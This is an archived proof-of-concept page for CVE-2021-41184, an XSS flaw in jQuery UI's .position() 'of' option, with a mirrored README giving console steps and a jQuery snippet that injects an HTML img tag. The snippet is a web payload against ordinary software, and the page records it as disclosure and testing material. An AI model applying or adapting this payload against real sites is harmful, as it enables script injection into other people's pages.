CVE-2021-41184 PoC — Openjs Jquery Ui 跨站脚本漏洞

Source

https://github.com/gabrielolivra/Exploit-Medium-CVE-2021-41184

Associated Vulnerability

Title:Openjs Jquery Ui 跨站脚本漏洞 (CVE-2021-41184)
Description:Openjs Jquery Ui是Openjs基金会的一款基于Javascript语言用于创建交互式用户界面的代码库。 Openjs Jquery Ui 1.13.0之前版本存在跨站脚本漏洞，攻击者可以通过.position()选项的值执行任意代码。

Readme

# Exploit-Medium-CVE-2021-41184

Exploit Medium	CVE-2021-41184 XSS in the `of` option of the `.position()` util

1. jQuery ui version v1.12.1 vulnerable

1.1 https://www.website.com/_js/jquery/jquery-ui-1.12.1/jquery-ui.min.js



------------------------------------------------Concept proof---------------------------------------------------------------



1. Open url 

2. Open inspect 

3. Look for some ID in site elements

3.1 #ID

4. Go to console tab

5. Inject script with ID selected at point 3.1

5.1 Script


	$("#id").position( {
	my: "center",
	at: "right bottom",
	of: "<img scr='https://media.makeameme.org/created/xss-xss-everywhere-5b8065.jpg' src='' />",
	collision: "none"
        });

File Snapshot


 [4.0K]  /data/pocs/e3f403e8207d18c2177b59617b016a449ea6466f
└── [ 704]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.